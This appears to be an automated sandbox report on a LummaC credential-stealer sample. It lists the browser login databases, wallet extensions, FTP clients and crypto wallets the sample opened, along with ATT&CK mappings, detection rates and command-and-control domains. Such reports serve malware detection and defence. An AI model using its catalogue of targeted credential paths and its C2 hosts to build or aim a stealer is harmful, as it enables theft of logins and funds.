                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2776645299.0000000001262000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2777182643.0000000001263000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: XM6cn2uNux.exe PID: 5448, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: XM6cn2uNux.exe PID: 5448, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		851
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory44
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol41
                Data from Local System                		2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                XM6cn2uNux.exe54%VirustotalBrowse
                XM6cn2uNux.exe58%ReversingLabsWin32.Exploit.LummaC
                XM6cn2uNux.exe100%AviraTR/Crypt.XPACK.Gen
                XM6cn2uNux.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://mindhandru.buzz/s40%Avira URL Cloudsafe
                https://mindhandru.buzz/apijs0%Avira URL Cloudsafe
                https://mindhandru.buzz:443/apily0%Avira URL Cloudsafe
                https://mindhandru.buzz/apin0%Avira URL Cloudsafe
                https://mindhandru.buzz:443/api100%Avira URL Cloudmalware
                https://mindhandru.buzz/.$0%Avira URL Cloudsafe
                https://mindhandru.buzz/d0%Avira URL Cloudsafe
                https://mindhandru.buzz:443/apiF0%Avira URL Cloudsafe
                mindhandru.buzz0%Avira URL Cloudsafe
                https://mindhandru.buzz/api$M0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                fp2e7a.wpc.phicdn.net
                		192.229.221.95
                		truefalse
                  		high
                  mindhandru.buzz
                  		172.67.165.185
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    scentniej.buzzfalse
                      		high
                      rebuildeso.buzzfalse
                        		high
                        appliacnesot.buzzfalse
                          		high
                          screwamusresz.buzzfalse
                            		high
                            cashfuzysao.buzzfalse
                              		high
                              inherineau.buzzfalse
                                		high
                                prisonyfork.buzzfalse
                                  		high
                                  hummskitnj.buzzfalse
                                    		high
                                    mindhandru.buzztrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://mindhandru.buzz/apifalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabXM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://mindhandru.buzz/apijsXM6cn2uNux.exe, 00000000.00000003.3496261170.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3496047879.00000000011F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/ac/?q=XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoXM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiXM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://mindhandru.buzz/s4XM6cn2uNux.exe, 00000000.00000003.3516396766.0000000001247000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550214215.0000000001252000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516501138.000000000124D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543162097.0000000001252000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520918204.000000000124E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3534957778.000000000124E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000002.3557552788.0000000001252000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://mindhandru.buzz/XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3498179672.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3493218176.000000000128D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3493013249.000000000128D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://mindhandru.buzz/apinXM6cn2uNux.exe, 00000000.00000002.3557025653.0000000001209000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ocsp.rootca1.amazontrust.com0:XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://mindhandru.buzz:443/apilyXM6cn2uNux.exe, 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543458647.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520973311.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000002.3557479186.000000000122F000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551638285.000000000122F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.ecosia.org/newtab/XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgXM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://mindhandru.buzz/.$XM6cn2uNux.exe, 00000000.00000002.3557025653.0000000001209000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brXM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://mindhandru.buzz/dXM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://mindhandru.buzz:443/apiXM6cn2uNux.exe, XM6cn2uNux.exe, 00000000.00000003.3516546592.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516461851.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://ac.ecosia.org/autocomplete?q=XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://mindhandru.buzz/api$MXM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://crl.microXM6cn2uNux.exe, 00000000.00000003.3516396766.0000000001247000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516501138.000000000124D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520918204.000000000124E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3534957778.000000000124E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgXM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://x1.c.lencr.org/0XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://x1.i.lencr.org/0XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchXM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://mindhandru.buzz:443/apiFXM6cn2uNux.exe, 00000000.00000003.3543458647.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000002.3557479186.000000000122F000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551638285.000000000122F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://support.mozilla.org/products/firefoxgro.allXM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.mozilla.orXM6cn2uNux.exe, 00000000.00000003.2778602554.0000000005A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaXM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high

